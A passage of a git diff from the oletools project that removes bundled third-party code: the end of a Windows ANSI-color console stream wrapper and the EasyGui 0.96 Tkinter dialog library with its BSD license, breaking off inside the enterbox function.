- bg_color = csbi.wAttributes & 240
- native_ansi = bool(dword.value & ENABLE_VIRTUAL_TERMINAL_PROCESSING)
-
- return fg_color, bg_color, native_ansi
-
-
-def bg_color_native_ansi(kernel32, stderr, stdout):
- """Get background color and if console supports ANSI colors natively for both streams.
-
- :param ctypes.windll.kernel32 kernel32: Loaded kernel32 instance.
- :param int stderr: stderr handle.
- :param int stdout: stdout handle.
-
- :return: Background color (int) and native ANSI support (bool).
- :rtype: tuple
- """
- try:
- if stderr == INVALID_HANDLE_VALUE:
- raise OSError
- bg_color, native_ansi = get_console_info(kernel32, stderr)[1:]
- except OSError:
- try:
- if stdout == INVALID_HANDLE_VALUE:
- raise OSError
- bg_color, native_ansi = get_console_info(kernel32, stdout)[1:]
- except OSError:
- bg_color, native_ansi = WINDOWS_CODES['black'], False
- return bg_color, native_ansi
-
-
-class WindowsStream(object):
- """Replacement stream which overrides sys.stdout or sys.stderr. When writing or printing, ANSI codes are converted.
-
- ANSI (Linux/Unix) color codes are converted into win32 system calls, changing the next character's color before
- printing it. Resources referenced:
- https://github.com/tartley/colorama
- http://www.cplusplus.com/articles/2ywTURfi/
- http://thomasfischer.biz/python-and-windows-terminal-colors/
- http://stackoverflow.com/questions/17125440/c-win32-console-color
- http://www.tysos.org/svn/trunk/mono/corlib/System/WindowsConsoleDriver.cs
- http://stackoverflow.com/questions/287871/print-in-terminal-with-colors-using-python
- http://msdn.microsoft.com/en-us/library/windows/desktop/ms682088#_win32_character_attributes
-
- :cvar list ALL_BG_CODES: List of bg Windows codes. Used to determine if requested color is foreground or background.
- :cvar dict COMPILED_CODES: Translation dict. Keys are ANSI codes (values of BASE_CODES), values are Windows codes.
- :ivar int default_fg: Foreground Windows color code at the time of instantiation.
- :ivar int default_bg: Background Windows color code at the time of instantiation.
- """
-
- ALL_BG_CODES = [v for k, v in WINDOWS_CODES.items() if k.startswith('bg') or k.startswith('hibg')]
- COMPILED_CODES = dict((v, WINDOWS_CODES[k]) for k, v in BASE_CODES.items() if k in WINDOWS_CODES)
-
- def __init__(self, kernel32, stream_handle, original_stream):
- """Constructor.
-
- :param ctypes.windll.kernel32 kernel32: Loaded kernel32 instance.
- :param int stream_handle: stderr or stdout handle.
- :param original_stream: sys.stderr or sys.stdout before being overridden by this class' instance.
- """
- self._kernel32 = kernel32
- self._stream_handle = stream_handle
- self._original_stream = original_stream
- self.default_fg, self.default_bg = self.colors
-
- def __getattr__(self, item):
- """If an attribute/function/etc is not defined in this function, retrieve the one from the original stream.
-
- Fixes ipython arrow key presses.
- """
- return getattr(self._original_stream, item)
-
- @property
- def colors(self):
- """Return the current foreground and background colors."""
- try:
- return get_console_info(self._kernel32, self._stream_handle)[:2]
- except OSError:
- return WINDOWS_CODES['white'], WINDOWS_CODES['black']
-
- @colors.setter
- def colors(self, color_code):
- """Change the foreground and background colors for subsequently printed characters.
-
- None resets colors to their original values (when class was instantiated).
-
- Since setting a color requires including both foreground and background codes (merged), setting just the
- foreground color resets the background color to black, and vice versa.
-
- This function first gets the current background and foreground colors, merges in the requested color code, and
- sets the result.
-
- However if we need to remove just the foreground color but leave the background color the same (or vice versa)
- such as when {/red} is used, we must merge the default foreground color with the current background color. This
- is the reason for those negative values.
-
- :param int color_code: Color code from WINDOWS_CODES.
- """
- if color_code is None:
- color_code = WINDOWS_CODES['/all']
-
- # Get current color code.
- current_fg, current_bg = self.colors
-
- # Handle special negative codes. Also determine the final color code.
- if color_code == WINDOWS_CODES['/fg']:
- final_color_code = self.default_fg | current_bg # Reset the foreground only.
- elif color_code == WINDOWS_CODES['/bg']:
- final_color_code = current_fg | self.default_bg # Reset the background only.
- elif color_code == WINDOWS_CODES['/all']:
- final_color_code = self.default_fg | self.default_bg # Reset both.
- elif color_code == WINDOWS_CODES['bgblack']:
- final_color_code = current_fg # Black background.
- else:
- new_is_bg = color_code in self.ALL_BG_CODES
- final_color_code = color_code | (current_fg if new_is_bg else current_bg)
-
- # Set new code.
- self._kernel32.SetConsoleTextAttribute(self._stream_handle, final_color_code)
-
- def write(self, p_str):
- """Write to stream.
-
- :param str p_str: string to print.
- """
- for segment in RE_SPLIT.split(p_str):
- if not segment:
- # Empty string. p_str probably starts with colors so the first item is always ''.
- continue
- if not RE_SPLIT.match(segment):
- # No color codes, print regular text.
- print(segment, file=self._original_stream, end='')
- self._original_stream.flush()
- continue
- for color_code in (int(c) for c in RE_NUMBER_SEARCH.findall(segment)[0].split(';')):
- if color_code in self.COMPILED_CODES:
- self.colors = self.COMPILED_CODES[color_code]
-
-
-class Windows(object):
- """Enable and disable Windows support for ANSI color character codes.
-
- Call static method Windows.enable() to enable color support for the remainder of the process' lifetime.
-
- This class is also a context manager. You can do this:
- with Windows():
- print(Color('{autored}Test{/autored}'))
-
- Or this:
- with Windows(auto_colors=True):
- print(Color('{autored}Test{/autored}'))
- """
-
- @classmethod
- def disable(cls):
- """Restore sys.stderr and sys.stdout to their original objects. Resets colors to their original values.
-
- :return: If streams restored successfully.
- :rtype: bool
- """
- # Skip if not on Windows.
- if not IS_WINDOWS:
- return False
-
- # Restore default colors.
- if hasattr(sys.stderr, '_original_stream'):
- getattr(sys, 'stderr').color = None
- if hasattr(sys.stdout, '_original_stream'):
- getattr(sys, 'stdout').color = None
-
- # Restore original streams.
- changed = False
- if hasattr(sys.stderr, '_original_stream'):
- changed = True
- sys.stderr = getattr(sys.stderr, '_original_stream')
- if hasattr(sys.stdout, '_original_stream'):
- changed = True
- sys.stdout = getattr(sys.stdout, '_original_stream')
-
- return changed
-
- @staticmethod
- def is_enabled():
- """Return True if either stderr or stdout has colors enabled."""
- return hasattr(sys.stderr, '_original_stream') or hasattr(sys.stdout, '_original_stream')
-
- @classmethod
- def enable(cls, auto_colors=False, reset_atexit=False):
- """Enable color text with print() or sys.stdout.write() (stderr too).
-
- :param bool auto_colors: Automatically selects dark or light colors based on current terminal's background
- color. Only works with {autored} and related tags.
- :param bool reset_atexit: Resets original colors upon Python exit (in case you forget to reset it yourself with
- a closing tag). Does nothing on native ANSI consoles.
-
- :return: If streams replaced successfully.
- :rtype: bool
- """
- if not IS_WINDOWS:
- return False # Windows only.
-
- # Get values from init_kernel32().
- kernel32, stderr, stdout = init_kernel32()
- if stderr == INVALID_HANDLE_VALUE and stdout == INVALID_HANDLE_VALUE:
- return False # No valid handles, nothing to do.
-
- # Get console info.
- bg_color, native_ansi = bg_color_native_ansi(kernel32, stderr, stdout)
-
- # Set auto colors:
- if auto_colors:
- if bg_color in (112, 96, 240, 176, 224, 208, 160):
- ANSICodeMapping.set_light_background()
- else:
- ANSICodeMapping.set_dark_background()
-
- # Don't replace streams if ANSI codes are natively supported.
- if native_ansi:
- return False
-
- # Reset on exit if requested.
- if reset_atexit:
- atexit.register(cls.disable)
-
- # Overwrite stream references.
- if stderr != INVALID_HANDLE_VALUE:
- sys.stderr.flush()
- sys.stderr = WindowsStream(kernel32, stderr, sys.stderr)
- if stdout != INVALID_HANDLE_VALUE:
- sys.stdout.flush()
- sys.stdout = WindowsStream(kernel32, stdout, sys.stdout)
-
- return True
-
- def __init__(self, auto_colors=False):
- """Constructor."""
- self.auto_colors = auto_colors
-
- def __enter__(self):
- """Context manager, enables colors on Windows."""
- self.enable(auto_colors=self.auto_colors)
-
- def __exit__(self, *_):
-        """Context manager, disables colors on Windows."""
- self.disable()
diff --git a/oletools/thirdparty/easygui/LICENSE.txt b/oletools/thirdparty/easygui/LICENSE.txt
deleted file mode 100644
index b04511b6..00000000
--- a/oletools/thirdparty/easygui/LICENSE.txt
+++ /dev/null
@@ -1,32 +0,0 @@
-LICENSE INFORMATION
-
-EasyGui version 0.96
-
-Copyright (c) 2010, Stephen Raymond Ferg
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
- 1. Redistributions of source code must retain the above copyright notice,
- this list of conditions and the following disclaimer.
-
- 2. Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation and/or
- other materials provided with the distribution.
-
- 3. The name of the author may not be used to endorse or promote products derived
- from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
-INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
-IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
-EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/oletools/thirdparty/easygui/easygui.py b/oletools/thirdparty/easygui/easygui.py
deleted file mode 100644
index 016ffd59..00000000
--- a/oletools/thirdparty/easygui/easygui.py
+++ /dev/null
@@ -1,2492 +0,0 @@
-"""
-@version: 0.96(2010-08-29)
-
-@note:
-ABOUT EASYGUI
-
-EasyGui provides an easy-to-use interface for simple GUI interaction
-with a user. It does not require the programmer to know anything about
-tkinter, frames, widgets, callbacks or lambda. All GUI interactions are
-invoked by simple function calls that return results.
-
-@note:
-WARNING about using EasyGui with IDLE
-
-You may encounter problems using IDLE to run programs that use EasyGui. Try it
-and find out. EasyGui is a collection of Tkinter routines that run their own
-event loops. IDLE is also a Tkinter application, with its own event loop. The
-two may conflict, with unpredictable results. If you find that you have
-problems, try running your EasyGui program outside of IDLE.
-
-Note that EasyGui requires Tk release 8.0 or greater.
-
-@note:
-LICENSE INFORMATION
-
-EasyGui version 0.96
-
-Copyright (c) 2010, Stephen Raymond Ferg
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
- 1. Redistributions of source code must retain the above copyright notice,
- this list of conditions and the following disclaimer.
-
- 2. Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation and/or
- other materials provided with the distribution.
-
- 3. The name of the author may not be used to endorse or promote products derived
- from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
-INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
-IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
-EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-@note:
-ABOUT THE EASYGUI LICENSE
-
-This license is what is generally known as the "modified BSD license",
-aka "revised BSD", "new BSD", "3-clause BSD".
-See http://www.opensource.org/licenses/bsd-license.php
-
-This license is GPL-compatible.
-See http://en.wikipedia.org/wiki/License_compatibility
-See http://www.gnu.org/licenses/license-list.html#GPLCompatibleLicenses
-
-The BSD License is less restrictive than GPL.
-It allows software released under the license to be incorporated into proprietary products.
-Works based on the software may be released under a proprietary license or as closed source software.
-http://en.wikipedia.org/wiki/BSD_licenses#3-clause_license_.28.22New_BSD_License.22.29
-
-"""
-egversion = __doc__.split()[1]
-
-__all__ = ['ynbox'
- , 'ccbox'
- , 'boolbox'
- , 'indexbox'
- , 'msgbox'
- , 'buttonbox'
- , 'integerbox'
- , 'multenterbox'
- , 'enterbox'
- , 'exceptionbox'
- , 'choicebox'
- , 'codebox'
- , 'textbox'
- , 'diropenbox'
- , 'fileopenbox'
- , 'filesavebox'
- , 'passwordbox'
- , 'multpasswordbox'
- , 'multchoicebox'
- , 'abouteasygui'
- , 'egversion'
- , 'egdemo'
- , 'EgStore'
- ]
-
-import sys, os
-import string
-import pickle
-import traceback
-
-
-#--------------------------------------------------
-# check python version and take appropriate action
-#--------------------------------------------------
-"""
-From the python documentation:
-
-sys.hexversion contains the version number encoded as a single integer. This is
-guaranteed to increase with each version, including proper support for non-
-production releases. For example, to test that the Python interpreter is at
-least version 1.5.2, use:
-
-if sys.hexversion >= 0x010502F0:
- # use some advanced feature
- ...
-else:
- # use an alternative implementation or warn the user
- ...
-"""
-
-
-if sys.hexversion >= 0x020600F0:
- runningPython26 = True
-else:
- runningPython26 = False
-
-if sys.hexversion >= 0x030000F0:
- runningPython3 = True
-else:
- runningPython3 = False
-
-try:
- from PIL import Image as PILImage
- from PIL import ImageTk as PILImageTk
- PILisLoaded = True
-except:
- PILisLoaded = False
-
-
-if runningPython3:
- from tkinter import *
- import tkinter.filedialog as tk_FileDialog
- from io import StringIO
-else:
- from Tkinter import *
- import tkFileDialog as tk_FileDialog
- from StringIO import StringIO
-
-def write(*args):
- args = [str(arg) for arg in args]
- args = " ".join(args)
- sys.stdout.write(args)
-
-def writeln(*args):
- write(*args)
- sys.stdout.write("\n")
-
-say = writeln
-
-
-if TkVersion < 8.0 :
- stars = "*"*75
- writeln("""\n\n\n""" + stars + """
-You are running Tk version: """ + str(TkVersion) + """
-You must be using Tk version 8.0 or greater to use EasyGui.
-Terminating.
-""" + stars + """\n\n\n""")
- sys.exit(0)
-
-def dq(s):
- return '"%s"' % s
-
-rootWindowPosition = "+300+200"
-
-PROPORTIONAL_FONT_FAMILY = ("MS", "Sans", "Serif")
-MONOSPACE_FONT_FAMILY = ("Courier")
-
-PROPORTIONAL_FONT_SIZE = 10
-MONOSPACE_FONT_SIZE = 9 #a little smaller, because it is more legible at a smaller size
-TEXT_ENTRY_FONT_SIZE = 12 # a little larger makes it easier to see
-
-#STANDARD_SELECTION_EVENTS = ["Return", "Button-1"]
-STANDARD_SELECTION_EVENTS = ["Return", "Button-1", "space"]
-
-# Initialize some global variables that will be reset later
-__choiceboxMultipleSelect = None
-__widgetTexts = None
-__replyButtonText = None
-__choiceboxResults = None
-__firstWidget = None
-__enterboxText = None
-__enterboxDefaultText=""
-__multenterboxText = ""
-choiceboxChoices = None
-choiceboxWidget = None
-entryWidget = None
-boxRoot = None
-ImageErrorMsg = (
- "\n\n---------------------------------------------\n"
- "Error: %s\n%s")
-#-------------------------------------------------------------------
-# various boxes built on top of the basic buttonbox
-#-----------------------------------------------------------------------
-
-#-----------------------------------------------------------------------
-# ynbox
-#-----------------------------------------------------------------------
-def ynbox(msg="Shall I continue?"
- , title=" "
- , choices=("Yes", "No")
- , image=None
- ):
- """
- Display a msgbox with choices of Yes and No.
-
- The default is "Yes".
-
- The returned value is calculated this way::
- if the first choice ("Yes") is chosen, or if the dialog is cancelled:
- return 1
- else:
- return 0
-
- If invoked without a msg argument, displays a generic request for a confirmation
- that the user wishes to continue. So it can be used this way::
- if ynbox(): pass # continue
- else: sys.exit(0) # exit the program
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- return boolbox(msg, title, choices, image=image)
-
-
-#-----------------------------------------------------------------------
-# ccbox
-#-----------------------------------------------------------------------
-def ccbox(msg="Shall I continue?"
- , title=" "
- , choices=("Continue", "Cancel")
- , image=None
- ):
- """
- Display a msgbox with choices of Continue and Cancel.
-
- The default is "Continue".
-
- The returned value is calculated this way::
- if the first choice ("Continue") is chosen, or if the dialog is cancelled:
- return 1
- else:
- return 0
-
- If invoked without a msg argument, displays a generic request for a confirmation
- that the user wishes to continue. So it can be used this way::
-
- if ccbox():
- pass # continue
- else:
- sys.exit(0) # exit the program
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- return boolbox(msg, title, choices, image=image)
-
-
-#-----------------------------------------------------------------------
-# boolbox
-#-----------------------------------------------------------------------
-def boolbox(msg="Shall I continue?"
- , title=" "
- , choices=("Yes","No")
- , image=None
- ):
- """
- Display a boolean msgbox.
-
- The default is the first choice.
-
- The returned value is calculated this way::
- if the first choice is chosen, or if the dialog is cancelled:
- returns 1
- else:
- returns 0
- """
- reply = buttonbox(msg=msg, choices=choices, title=title, image=image)
- if reply == choices[0]: return 1
- else: return 0
-
-
-#-----------------------------------------------------------------------
-# indexbox
-#-----------------------------------------------------------------------
-def indexbox(msg="Shall I continue?"
- , title=" "
- , choices=("Yes","No")
- , image=None
- ):
- """
- Display a buttonbox with the specified choices.
- Return the index of the choice selected.
- """
- reply = buttonbox(msg=msg, choices=choices, title=title, image=image)
- index = -1
- for choice in choices:
- index = index + 1
- if reply == choice: return index
- raise AssertionError(
- "There is a program logic error in the EasyGui code for indexbox.")
-
-
-#-----------------------------------------------------------------------
-# msgbox
-#-----------------------------------------------------------------------
-def msgbox(msg="(Your message goes here)", title=" ", ok_button="OK",image=None,root=None):
- """
- Display a messagebox
- """
- if type(ok_button) != type("OK"):
- raise AssertionError("The 'ok_button' argument to msgbox must be a string.")
-
- return buttonbox(msg=msg, title=title, choices=[ok_button], image=image,root=root)
-
-
-#-------------------------------------------------------------------
-# buttonbox
-#-------------------------------------------------------------------
-def buttonbox(msg="",title=" "
- ,choices=("Button1", "Button2", "Button3")
- , image=None
- , root=None
- ):
- """
- Display a msg, a title, and a set of buttons.
- The buttons are defined by the members of the choices list.
- Return the text of the button that the user selected.
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- global boxRoot, __replyButtonText, __widgetTexts, buttonsFrame
-
-
- # Initialize __replyButtonText to the first choice.
- # This is what will be used if the window is closed by the close button.
- __replyButtonText = choices[0]
-
- if root:
- root.withdraw()
- boxRoot = Toplevel(master=root)
- boxRoot.withdraw()
- else:
- boxRoot = Tk()
- boxRoot.withdraw()
-
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- boxRoot.geometry(rootWindowPosition)
- boxRoot.minsize(400, 100)
-
- # ------------- define the messageFrame ---------------------------------
- messageFrame = Frame(master=boxRoot)
- messageFrame.pack(side=TOP, fill=BOTH)
-
- # ------------- define the imageFrame ---------------------------------
- tk_Image = None
- if image:
- imageFilename = os.path.normpath(image)
- junk,ext = os.path.splitext(imageFilename)
-
- if os.path.exists(imageFilename):
- if ext.lower() in [".gif", ".pgm", ".ppm"]:
- tk_Image = PhotoImage(master=boxRoot, file=imageFilename)
- else:
- if PILisLoaded:
- try:
- pil_Image = PILImage.open(imageFilename)
- tk_Image = PILImageTk.PhotoImage(pil_Image, master=boxRoot)
- except:
- msg += ImageErrorMsg % (imageFilename,
- "\nThe Python Imaging Library (PIL) could not convert this file to a displayable image."
- "\n\nPIL reports:\n" + exception_format())
-
- else: # PIL is not loaded
- msg += ImageErrorMsg % (imageFilename,
- "\nI could not import the Python Imaging Library (PIL) to display the image.\n\n"
- "You may need to install PIL\n"
- "(http://www.pythonware.com/products/pil/)\n"
- "to display " + ext + " image files.")
-
- else:
- msg += ImageErrorMsg % (imageFilename, "\nImage file not found.")
-
- if tk_Image:
- imageFrame = Frame(master=boxRoot)
- imageFrame.pack(side=TOP, fill=BOTH)
- label = Label(imageFrame,image=tk_Image)
- label.image = tk_Image # keep a reference!
- label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m')
-
- # ------------- define the buttonsFrame ---------------------------------
- buttonsFrame = Frame(master=boxRoot)
- buttonsFrame.pack(side=TOP, fill=BOTH)
-
- # -------------------- place the widgets in the frames -----------------------
- messageWidget = Message(messageFrame, text=msg, width=400)
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m')
-
- __put_buttons_in_buttonframe(choices)
-
- # -------------- the action begins -----------
- # put the focus on the first button
- __firstWidget.focus_force()
-
- boxRoot.deiconify()
- boxRoot.mainloop()
- boxRoot.destroy()
- if root: root.deiconify()
- return __replyButtonText
-
-
-#-------------------------------------------------------------------
-# integerbox
-#-------------------------------------------------------------------
-def integerbox(msg=""
- , title=" "
- , default=""
- , lowerbound=0
- , upperbound=99
- , image = None
- , root = None
- , **invalidKeywordArguments
- ):
- """
- Show a box in which a user can enter an integer.
-
- In addition to arguments for msg and title, this function accepts
- integer arguments for "default", "lowerbound", and "upperbound".
-
- The default argument may be None.
-
- When the user enters some text, the text is checked to verify that it
- can be converted to an integer between the lowerbound and upperbound.
-
- If it can be, the integer (not the text) is returned.
-
- If it cannot, then an error msg is displayed, and the integerbox is
- redisplayed.
-
- If the user cancels the operation, None is returned.
-
- NOTE that the "argLowerBound" and "argUpperBound" arguments are no longer
- supported. They have been replaced by "upperbound" and "lowerbound".
- """
- if "argLowerBound" in invalidKeywordArguments:
- raise AssertionError(
- "\nintegerbox no longer supports the 'argLowerBound' argument.\n"
- + "Use 'lowerbound' instead.\n\n")
- if "argUpperBound" in invalidKeywordArguments:
- raise AssertionError(
- "\nintegerbox no longer supports the 'argUpperBound' argument.\n"
- + "Use 'upperbound' instead.\n\n")
-
- if default != "":
- if type(default) != type(1):
- raise AssertionError(
- "integerbox received a non-integer value for "
- + "default of " + dq(str(default)) , "Error")
-
- if type(lowerbound) != type(1):
- raise AssertionError(
- "integerbox received a non-integer value for "
- + "lowerbound of " + dq(str(lowerbound)) , "Error")
-
- if type(upperbound) != type(1):
- raise AssertionError(
- "integerbox received a non-integer value for "
- + "upperbound of " + dq(str(upperbound)) , "Error")
-
- if msg == "":
- msg = ("Enter an integer between " + str(lowerbound)
- + " and "
- + str(upperbound)
- )
-
- while 1:
- reply = enterbox(msg, title, str(default), image=image, root=root)
- if reply == None: return None
-
- try:
- reply = int(reply)
- except:
- msgbox ("The value that you entered:\n\t%s\nis not an integer." % dq(str(reply))
- , "Error")
- continue
-
- if reply < lowerbound:
- msgbox ("The value that you entered is less than the lower bound of "
- + str(lowerbound) + ".", "Error")
- continue
-
- if reply > upperbound:
- msgbox ("The value that you entered is greater than the upper bound of "
- + str(upperbound) + ".", "Error")
- continue
-
- # reply has passed all validation checks.
- # It is an integer between the specified bounds.
- return reply
-
-#-------------------------------------------------------------------
-# multenterbox
-#-------------------------------------------------------------------
-def multenterbox(msg="Fill in values for the fields."
- , title=" "
- , fields=()
- , values=()
- ):
- r"""
- Show screen with multiple data entry fields.
-
- If there are fewer values than names, the list of values is padded with
- empty strings until the number of values is the same as the number of names.
-
- If there are more values than names, the list of values
- is truncated so that there are as many values as names.
-
- Returns a list of the values of the fields,
- or None if the user cancels the operation.
-
- Here is some example code, that shows how values returned from
- multenterbox can be checked for validity before they are accepted::
- ----------------------------------------------------------------------
- msg = "Enter your personal information"
- title = "Credit Card Application"
- fieldNames = ["Name","Street Address","City","State","ZipCode"]
- fieldValues = [] # we start with blanks for the values
- fieldValues = multenterbox(msg,title, fieldNames)
-
- # make sure that none of the fields was left blank
- while 1:
- if fieldValues == None: break
- errmsg = ""
- for i in range(len(fieldNames)):
- if fieldValues[i].strip() == "":
- errmsg += ('"%s" is a required field.\n\n' % fieldNames[i])
- if errmsg == "":
- break # no problems found
- fieldValues = multenterbox(errmsg, title, fieldNames, fieldValues)
-
- writeln("Reply was: %s" % str(fieldValues))
- ----------------------------------------------------------------------
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg fields: a list of fieldnames.
- @arg values: a list of field values
- """
- return __multfillablebox(msg,title,fields,values,None)
-
-
-#-----------------------------------------------------------------------
-# multpasswordbox
-#-----------------------------------------------------------------------
-def multpasswordbox(msg="Fill in values for the fields."
- , title=" "
- , fields=tuple()
- ,values=tuple()
- ):
- r"""
- Same interface as multenterbox. But in multpassword box,
- the last of the fields is assumed to be a password, and
- is masked with asterisks.
-
- Example
- =======
-
- Here is some example code, that shows how values returned from
- multpasswordbox can be checked for validity before they are accepted::
- msg = "Enter logon information"
- title = "Demo of multpasswordbox"
- fieldNames = ["Server ID", "User ID", "Password"]
- fieldValues = [] # we start with blanks for the values
- fieldValues = multpasswordbox(msg,title, fieldNames)
-
- # make sure that none of the fields was left blank
- while 1:
- if fieldValues == None: break
- errmsg = ""
- for i in range(len(fieldNames)):
- if fieldValues[i].strip() == "":
- errmsg = errmsg + ('"%s" is a required field.\n\n' % fieldNames[i])
- if errmsg == "": break # no problems found
- fieldValues = multpasswordbox(errmsg, title, fieldNames, fieldValues)
-
- writeln("Reply was: %s" % str(fieldValues))
- """
- return __multfillablebox(msg,title,fields,values,"*")
-
-def bindArrows(widget):
- widget.bind("<Down>", tabRight)
- widget.bind("<Up>" , tabLeft)
-
- widget.bind("<Right>",tabRight)
- widget.bind("<Left>" , tabLeft)
-
-def tabRight(event):
- boxRoot.event_generate("<Tab>")
-
-def tabLeft(event):
- boxRoot.event_generate("<Shift-Tab>")
-
-#-----------------------------------------------------------------------
-# __multfillablebox
-#-----------------------------------------------------------------------
-def __multfillablebox(msg="Fill in values for the fields."
- , title=" "
- , fields=()
- , values=()
- , mask = None
- ):
- global boxRoot, __multenterboxText, __multenterboxDefaultText, cancelButton, entryWidget, okButton
-
- choices = ["OK", "Cancel"]
- if len(fields) == 0: return None
-
- fields = list(fields[:]) # convert possible tuples to a list
- values = list(values[:]) # convert possible tuples to a list
-
- if len(values) == len(fields): pass
- elif len(values) > len(fields):
- fields = fields[0:len(values)]
- else:
- while len(values) < len(fields):
- values.append("")
-
- boxRoot = Tk()
-
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- boxRoot.geometry(rootWindowPosition)
- boxRoot.bind("<Escape>", __multenterboxCancel)
-
- # -------------------- put subframes in the boxRoot --------------------
- messageFrame = Frame(master=boxRoot)
- messageFrame.pack(side=TOP, fill=BOTH)
-
- #-------------------- the msg widget ----------------------------
- messageWidget = Message(messageFrame, width="4.5i", text=msg)
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m')
-
- global entryWidgets
- entryWidgets = []
-
- lastWidgetIndex = len(fields) - 1
-
- for widgetIndex in range(len(fields)):
- argFieldName = fields[widgetIndex]
- argFieldValue = values[widgetIndex]
- entryFrame = Frame(master=boxRoot)
- entryFrame.pack(side=TOP, fill=BOTH)
-
- # --------- entryWidget ----------------------------------------------
- labelWidget = Label(entryFrame, text=argFieldName)
- labelWidget.pack(side=LEFT)
-
- entryWidget = Entry(entryFrame, width=40,highlightthickness=2)
- entryWidgets.append(entryWidget)
- entryWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,TEXT_ENTRY_FONT_SIZE))
- entryWidget.pack(side=RIGHT, padx="3m")
-
- bindArrows(entryWidget)
-
- entryWidget.bind("<Return>", __multenterboxGetText)
- entryWidget.bind("<Escape>", __multenterboxCancel)
-
- # for the last entryWidget, if this is a multpasswordbox,
- # show the contents as just asterisks
- if widgetIndex == lastWidgetIndex:
- if mask:
- entryWidgets[widgetIndex].configure(show=mask)
-
- # put text into the entryWidget
- entryWidgets[widgetIndex].insert(0,argFieldValue)
- widgetIndex += 1
-
- # ------------------ ok button -------------------------------
- buttonsFrame = Frame(master=boxRoot)
- buttonsFrame.pack(side=BOTTOM, fill=BOTH)
-
- okButton = Button(buttonsFrame, takefocus=1, text="OK")
- bindArrows(okButton)
- okButton.pack(expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = okButton
- handler = __multenterboxGetText
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # ------------------ cancel button -------------------------------
- cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel")
- bindArrows(cancelButton)
- cancelButton.pack(expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = cancelButton
- handler = __multenterboxCancel
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # ------------------- time for action! -----------------
- entryWidgets[0].focus_force() # put the focus on the entryWidget
- boxRoot.mainloop() # run it!
-
- # -------- after the run has completed ----------------------------------
- boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now
- return __multenterboxText
-
-
-#-----------------------------------------------------------------------
-# __multenterboxGetText
-#-----------------------------------------------------------------------
-def __multenterboxGetText(event):
- global __multenterboxText
-
- __multenterboxText = []
- for entryWidget in entryWidgets:
- __multenterboxText.append(entryWidget.get())
- boxRoot.quit()
-
-
-def __multenterboxCancel(event):
- global __multenterboxText
- __multenterboxText = None
- boxRoot.quit()
-
-
-#-------------------------------------------------------------------
-# enterbox
-#-------------------------------------------------------------------
-def enterbox(msg="Enter something."
- , title=" "
- , default=""
- , strip=True
- , image=None
- , root=None
- ):
- """
- Show a box in which a user can enter some text.
-
- You may optionally specify some default text, which will appear in the
- enterbox when it is displayed.
-
